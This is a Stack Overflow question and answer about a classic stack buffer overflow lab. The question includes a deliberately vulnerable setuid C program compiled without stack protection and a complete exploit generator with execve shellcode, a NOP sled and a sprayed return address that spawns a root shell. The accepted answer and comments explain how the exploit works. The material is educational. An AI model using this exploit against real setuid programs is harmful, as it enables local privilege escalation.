C - Buffer Overflow Details

Question

This particular problem has been addressed a few times here on stackoverflow, but I cannot find any previous post that addresses some questions that I have. I would like to note that I have read Aleph One's "Smashing the Stack for Fun and Profit", but there are still gaps in my understanding.

My question is: This works (spawns a root shell) for various buffer sizes of stack.c in bof() from buffer[12] to buffer[24]. Why does it not work (seg fault) for buffer[48] (which results in a seg fault), for example (or, how would the program need to be modified to make it work for such buffers)?

Please note that the following commands are used when compiling stack.c

# gcc -o stack -z execstack -fno-stack-protector stack.c
# chmod 4755 stack

And ASLR is OFF.

First, let's look at the vulnerable program: stack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

And the program to exploit this: test.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// code to spawn a shell
char shellcode[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
    FILE *badfile;
    char *ptr;
    long *a_ptr;
    long *ret;

    int offset = 450;
    int bsize = 517;

    char buffer[bsize];

    // a_ptr will store the return address
    ptr = buffer;
    a_ptr = (long *) ptr;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, bsize);

    /* Fill buffer with appropriate contents */
    printf("Stack Pointer (ESP): 0x%x\n", get_sp());

    ret = get_sp() + offset;
    printf("Address: 0x%x\n", ret);

    int i;
    for (i = 0; i < 350; i += 4)
        *(a_ptr++) = ret;

    for (i = 450; i < sizeof(shellcode) + 450; i++)
        buffer[i] = shellcode[i-450];

    buffer[bsize - 1] = '\0';
    /*Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

Below I will try to explain what I think is going on, and jot down notes as to where I believe the gaps in my knowledge are. If anyone has time to go over this as well as answer the question as stated earlier, then thank you.

Clearly, the buffer[12] in stack.c is going to be overflowed when strcpy() is called, because a string of size 517 is being copied into a buffer of size 12.

In test.c, I understand that we are creating the malicious buffer which is to be read by stack.c. This buffer is initialized with a bunch of NO-OP's (0x90). Beyond that, I am a bit confused.

1) What is the point of the offset being added to ret in ret = get_sp() + offset;? Also, why is offset = 450? I have tried other values for the offset and this program has still run (such as 460). 450 seems like a guess that happens to work.

2) At for (i = 0; i < 350; i += 4), why is 350 used? I don't understand the point of this value. I believe that this loop is filling the first 350 bytes of the buffer with the return address ret, but I do not understand why it is 350 bytes. I believe that we are increasing i by 4 each time because (long *) is 4 bytes. If this is true, shouldn't this 350 also be a multiple of 4?

3) Again, at for (i = 450; i < sizeof(shellcode) + 450; i++) (sizeof(shellcode) is 25), why do we start at 450 in the buffer? This is saying we are filling buffer[450] to buffer[475] with the shell code. Currently, everything after that should be initialized to a NO-OP. So what? Why 450 - 475?

Multiple questions in one, unclear, too broad and potential malware. This down/close vote is just too easy. — Martin James
– Martin James, Commented Oct 14, 2015 at 22:49
Potential malware? Anyway, I edited the post @MartinJames. Please help me improve the post further, if it needs it. — binker
– binker, Commented Oct 14, 2015 at 22:51

Davislor · Accepted Answer · 2015-10-14 23:09:21Z

1

Keep in mind that, in a 32-bit x86 program such as this, the bytes on top of the stack hold, from lowest address on up: local variables, the return address of the function, its parameters, any registers saved by the caller, the caller’s local variables, etc.

The loop is actually writing 348 bytes worth of four-byte return addresses to the top of the stack. (It predated C99 and x86_64 and therefore assumed that long is exactly 32 bits.) The purpose of this is just to ensure that, for any plausible amount of storage for local variables, the return address will get overwritten. It also tries to handle the case where the function with the vulnerability gets called from several levels deep and the top of the stack is no longer the same. Then there’s some padding with nop instructions, because if the function return lands anywhere in there, the CPU will just skip them. Finally, there’s the shell code, in machine language. The whole point is to get the return address to point anywhere in this part of the buffer. Note that this will only work if the exploit code can be sure that the address of the stack pointer in the caller’s address space is similar. Address-space randomization is a technique to defeat this.

In other words, the code repeats itself a few hundred times because stuff might not be at exactly the same place in a new process, and this way, it still works if the stack pointer is anywhere close to where it expects. The values are ballpark figures, but Aleph One talks about how to find them.

answered Oct 14, 2015 at 23:09

Davislor

15.6k2 gold badges39 silver badges54 bronze badges

Sign up to request clarification or add additional context in comments.

7 Comments

binker Over a year ago

Could you clarify -- You said that the code repeats itself a few hundred times. From what I can tell, the shellcode is only placed in the buffer once, and a return address is stored a couple hundred times. Does this imply that the return address being written to the buffer in test.c is supposed to point to somewhere in the shell code?

Davislor Over a year ago

Correct. The point is to overwrite the return address with the (guessed) address of the shell code, so that, on return, the program will run the shell code instead of resuming from whete the call was made. However, it doesn’t know exactly where the return address or the shell code are.

Davislor Over a year ago

Oh, and buffer sizes that aren’t multiples of 4 don’t work here because the 4-byte return addresses don’t come out aligned.

binker Over a year ago

The address of the shell code shouldn't have to be guessed though, I would think, since we know where we are placing it in the buffer. Also, I would like to state that your post has been helpful to me, but I think you may have been writing your answer while I edited the main post to focus on one question (which is now at the top of my post).

binker Over a year ago

I see your comment about buffer sizes needing to be multiples of 4. However, this same code does not work for, say, buffer[32]

|

Collectives™ on Stack Overflow

C - Buffer Overflow Details

1 Answer 1

7 Comments

Your Answer

Hot Network Questions

Collectives™ on Stack Overflow

1 Answer 1

7 Comments

Your Answer

Sign up or log in

Post as a guest

Related